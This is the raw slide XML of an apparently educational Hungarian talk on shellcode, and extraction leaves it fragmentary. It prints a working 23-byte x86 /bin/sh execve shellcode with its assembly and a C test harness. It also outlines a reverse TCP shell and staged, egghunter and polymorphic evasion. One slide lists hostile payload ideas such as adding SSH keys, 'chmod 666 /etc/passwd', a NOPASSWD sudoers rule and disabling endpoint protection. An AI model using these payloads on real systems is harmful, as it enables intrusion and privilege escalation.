          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10025"/>
            <a:ext cx="9192600" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="7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3" name="Google Shape;423;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="411" idx="2"/>
            <a:endCxn id="421" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240950" y="2755825"/>
            <a:ext cx="16794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4" name="Google Shape;424;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="412" idx="2"/>
            <a:endCxn id="421" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293250" y="2755825"/>
            <a:ext cx="6270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5" name="Google Shape;425;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="410" idx="2"/>
            <a:endCxn id="421" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6920150" y="2755825"/>
            <a:ext cx="4254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6" name="Google Shape;426;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="413" idx="2"/>
            <a:endCxn id="421" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6920350" y="2755825"/>
            <a:ext cx="1477500" cy="21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27" name="Google Shape;42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050" y="2008925"/>
            <a:ext cx="8487901" cy="11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68667"/>
            <a:ext cx="9144000" cy="596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/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3030" l="1060" r="-1059" t="-3030"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980125" y="-29925"/>
            <a:ext cx="52959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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188850" y="582750"/>
            <a:ext cx="1914900" cy="116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\xb9\x00\xa0\x04\x08\xba\x0d\x00\x00\x00\xb3\x01\xb0\x04\xcd\x80</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3371800"/>
            <a:ext cx="9384900" cy="13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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Null byte-ok miatt nagy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valószínűséggel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>működik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> shellcodeként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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Üzenet címére hivatkozik a parancs, nem az értékére</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p62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majdnem!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="441" name="Google Shape;44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4" y="1142727"/>
            <a:ext cx="8520600" cy="197951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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5862200" y="1200350"/>
            <a:ext cx="1966500" cy="32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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524525" y="1527950"/>
            <a:ext cx="1557600" cy="32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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067325" y="1223150"/>
            <a:ext cx="405600" cy="32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3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exploit meghatározza, hogy mely karakterek nem működnek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Null byte általában a C-type stringek miatt no-go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Null byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>kikerülésére</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> rengeteg kézi módszer létezik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msfvenom képes encodert talalni (ésszerű keretek között</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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63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 characters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="451" name="Google Shape;45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44450" y="1734075"/>
            <a:ext cx="1176650" cy="26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4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#include&lt;stdio.h&gt;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#include&lt;string.h&gt;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unsigned char code [] = "";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main()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printf("Shellcode Length: %d\n", strlen(code));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__asm__ ("movl $0xffffffff, %eax\n\t"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%ebx\n\t"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%ecx\n\t"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%edx\n\t"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%esi\n\t"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%edi\n\t"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	 "movl %eax, %ebp");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int (*ret)() = (int(*)())code;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	ret();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57" name="Google Shape;457;p64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Hogyan teszteljük a shellcodeunkat?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772075" y="1238200"/>
            <a:ext cx="6022200" cy="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latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Forrás: http://shell-storm.org/shellcode/files/shellcode-833.php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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1378505" y="1238200"/>
            <a:ext cx="26841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xor eax, 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edx, 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al, 0xb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ecx, edx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edx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0x68732f6e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0x69622f2f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ebx, esp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int 0x80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64" name="Google Shape;464;p65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/bin/sh execve shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925850" y="1729200"/>
            <a:ext cx="1811400" cy="591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execve (11) sys_call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66" name="Google Shape;466;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="467" idx="3"/>
            <a:endCxn id="465" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3615700" y="2024650"/>
            <a:ext cx="310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8" name="Google Shape;468;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4138888" y="2485900"/>
            <a:ext cx="1101000" cy="8067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0x00</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1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hs/n</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800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ib//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69" name="Google Shape;469;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="470" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3591300" y="2889250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1" name="Google Shape;471;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3930550" y="3458300"/>
            <a:ext cx="1517700" cy="726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/bin/sh címe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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(stack teteje)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2" name="Google Shape;472;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="473" idx="3"/>
            <a:endCxn id="471" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607725" y="3454475"/>
            <a:ext cx="322800" cy="36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0" name="Google Shape;470;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1378500" y="2468350"/>
            <a:ext cx="2212800" cy="8418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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394925" y="3340625"/>
            <a:ext cx="2212800" cy="227700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1402900" y="1870900"/>
            <a:ext cx="2212800" cy="3135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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925775" y="2046600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5" name="Google Shape;475;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="465" idx="3"/>
            <a:endCxn id="474" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5737250" y="2024700"/>
            <a:ext cx="188400" cy="26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6" name="Google Shape;476;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925800" y="2643250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EB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77" name="Google Shape;477;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="471" idx="3"/>
            <a:endCxn id="476" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5448250" y="2889350"/>
            <a:ext cx="477600" cy="93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8" name="Google Shape;478;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7128450" y="2320200"/>
            <a:ext cx="998400" cy="391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 0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="479" name="Google Shape;479;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="474" idx="3"/>
            <a:endCxn id="478" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924175" y="2292600"/>
            <a:ext cx="204300" cy="22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0" name="Google Shape;480;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="476" idx="3"/>
            <a:endCxn id="478" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6924200" y="2516050"/>
            <a:ext cx="2043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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1378505" y="1238200"/>
            <a:ext cx="26841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xor eax, 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edx, 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al, 0xb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ecx, edx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edx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0x68732f6e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push 0x69622f2f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mov ebx, esp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int 0x80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86" name="Google Shape;486;p66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/bin/sh execve shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925850" y="1729200"/>
            <a:ext cx="1811400" cy="591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execve (11) sys_call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88" name="Google Shape;488;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="489" idx="3"/>
            <a:endCxn id="487" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3615700" y="2024650"/>
            <a:ext cx="310200" cy="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p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4138888" y="2485900"/>
            <a:ext cx="1101000" cy="8067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0x00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hs/n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ib//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91" name="Google Shape;491;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="492" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3591300" y="2889250"/>
            <a:ext cx="58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3" name="Google Shape;493;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3930550" y="3458300"/>
            <a:ext cx="1517700" cy="726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/bin/sh címe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"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(stack teteje)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94" name="Google Shape;494;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="495" idx="3"/>
            <a:endCxn id="493" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607725" y="3454475"/>
            <a:ext cx="322800" cy="36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2" name="Google Shape;492;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1378500" y="2468350"/>
            <a:ext cx="2212800" cy="8418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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394925" y="3340625"/>
            <a:ext cx="2212800" cy="227700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1402900" y="1870900"/>
            <a:ext cx="2212800" cy="3135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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925775" y="2046600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EAX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97" name="Google Shape;497;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="487" idx="3"/>
            <a:endCxn id="496" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5737250" y="2024700"/>
            <a:ext cx="188400" cy="26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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925800" y="2643250"/>
            <a:ext cx="998400" cy="492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EBX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499" name="Google Shape;499;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="493" idx="3"/>
            <a:endCxn id="498" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5448250" y="2889350"/>
            <a:ext cx="477600" cy="93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0" name="Google Shape;500;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7128450" y="2320200"/>
            <a:ext cx="998400" cy="391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 0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="501" name="Google Shape;501;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="496" idx="3"/>
            <a:endCxn id="500" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924175" y="2292600"/>
            <a:ext cx="204300" cy="22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2" name="Google Shape;502;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="498" idx="3"/>
            <a:endCxn id="500" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6924200" y="2516050"/>
            <a:ext cx="204300" cy="3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3" name="Google Shape;503;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17700" y="-61225"/>
            <a:ext cx="9144000" cy="5204700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="7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4" name="Google Shape;5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5200" y="1228725"/>
            <a:ext cx="604837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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665200" y="4019700"/>
            <a:ext cx="6048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Méret: 23 byte</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\x31\xc0\x89\xc2\xb0\x0b\x89\xd1\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xcd\x80</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311699" y="1238200"/>
            <a:ext cx="80511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Több syscall egymásra épülve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Új TCP socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>file descriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> létrehozása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Csatlakozás adott a célponthoz (IP, port) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a socketen keresztül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stdin, stdout, stderr összekötése a sockettel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Shell indítása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Kód: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https://github.com/fuzboxz/SLAE/blob/master/assignments/reversetcp/reversetcp.nasm</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p67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Shell Reverse TCP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="512" name="Google Shape;5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676" y="878425"/>
            <a:ext cx="2704975" cy="370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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311699" y="1238200"/>
            <a:ext cx="80511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Több syscall egymásra épülve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Új TCP socket filedescriptor létrehozása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Csatlakozás adott a célponthoz (IP, port) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a socketen keresztül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stdin, stdout, stderr összekötése a sockettel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Shell indítása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Kód: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https://github.com/fuzboxz/SLAE/blob/master/assignments/reversetcp/reversetcp.nasm</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p68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reverse_tcp shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="519" name="Google Shape;51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676" y="878425"/>
            <a:ext cx="2704975" cy="370135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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="17975"/>
            <a:ext cx="9160500" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="7647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1" name="Google Shape;52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675" y="350175"/>
            <a:ext cx="5516650" cy="44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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813675" y="3299375"/>
            <a:ext cx="1728600" cy="1596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Miről lesz szó?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322750" y="1002600"/>
            <a:ext cx="8453400" cy="37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Exploit, shellcode, payload - alapfogalmak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 a különbség egy Assembly program és shellcode közöt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>xecve /bin/sh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reverse shell TCP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Több részes shellcode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Polimorfizmus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9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Saját SSH kulcs hozzáadása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chmod 666 /etc/passwd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sudoers + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ALL ALL=(ALL) NOPASSWD: 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Endpoint protection kikapcsolása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69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Egyéb shellcode példák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0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</a:rPr>
              <a:t>Több részes shellcode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534" name="Google Shape;534;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472458" y="47203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5" name="Google Shape;535;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1238200"/>
            <a:ext cx="86799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 kevés a rendelkezésre álló hely akkor használjuk őket.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Staged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Két részes shellcode. Az első rész letölti és </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>végrehajtja a második részt.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Egghunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Végigpásztázza a memóriát egy megjelölt </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>shellcode után, majd amikor megtalálta akkor végrehajtja azt.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Omelette</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Egghunter variáns, több darabból álló shellcodeot fűz össze és futtat le.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7100" y="1414700"/>
            <a:ext cx="1533400" cy="1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1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“Egyedi” shellcode használata a szignatúrák kicselezésére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Ekvivalens, de különböző utasítások használata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Operációs rendszer funkcióinak kihasználása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Egyedi decoder, stager vagy egghunter írása</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Google Shape;542;p71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Polimorfizmus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="543" name="Google Shape;54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975" y="1346925"/>
            <a:ext cx="1646800" cy="24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2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Hogyan álljunk neki?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Google Shape;549;p72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Kurzus: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>PentesterAcademy - x86 Assembly Language and Shellcoding on Linux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PentesterAcademy - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>x86_64 Assembly Language and Shellcoding on Linux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Könyv:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>The Shellcoder's Handbook: Discovering and Exploiting Security Holes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Videó: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https://www.youtube.com/watch?v=rvZsvSH2pXo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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10537" l="0" r="0" t="1052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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1399669"/>
            <a:ext cx="8229600" cy="14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2875" lIns="342900" spcFirstLastPara="1" rIns="342900" wrap="square" tIns="102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Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank you</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="4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6" name="Google Shape;55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6387" y="2684825"/>
            <a:ext cx="1691226" cy="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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1238201"/>
            <a:ext cx="8520600" cy="3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Kód, adat vagy utasítások sorozata, ami egy sérülékenység kihasználásával módosítja a program elvárt működését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52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 az az exploit?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318650" y="4543425"/>
            <a:ext cx="85206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Forrás: https://www.c0d3xpl0it.com/2017/05/eternalblue-doublepulsar-exploit-in-metasploit.html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p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="47087"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740776" y="2065675"/>
            <a:ext cx="5676350" cy="23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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1162001"/>
            <a:ext cx="8520600" cy="3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 kell felelni formailag a kikényszerített szabályoknak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Exploitban használható payload mérete véges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Off-the-shelf exploitok szignatúra alapon könnyen azonosíthatók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3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Exploit korlátai</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="331" name="Google Shape;3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0173" y="2726050"/>
            <a:ext cx="4163650" cy="19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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102575" y="4567450"/>
            <a:ext cx="88443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Forras: https://www.scriptjunkie.us/2012/08/shellcode-sizes-in-metasploit/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payload az exploit végrehajtandó része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Az exploit feladata a payload célbajuttatása</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p54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 az a payload?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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425" y="1257025"/>
            <a:ext cx="2095500" cy="249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54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7828725" y="1280700"/>
            <a:ext cx="351300" cy="3615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1" name="Google Shape;341;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769775" y="1620200"/>
            <a:ext cx="714900" cy="10575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2" name="Google Shape;342;p54"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="341" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6048575" y="2148950"/>
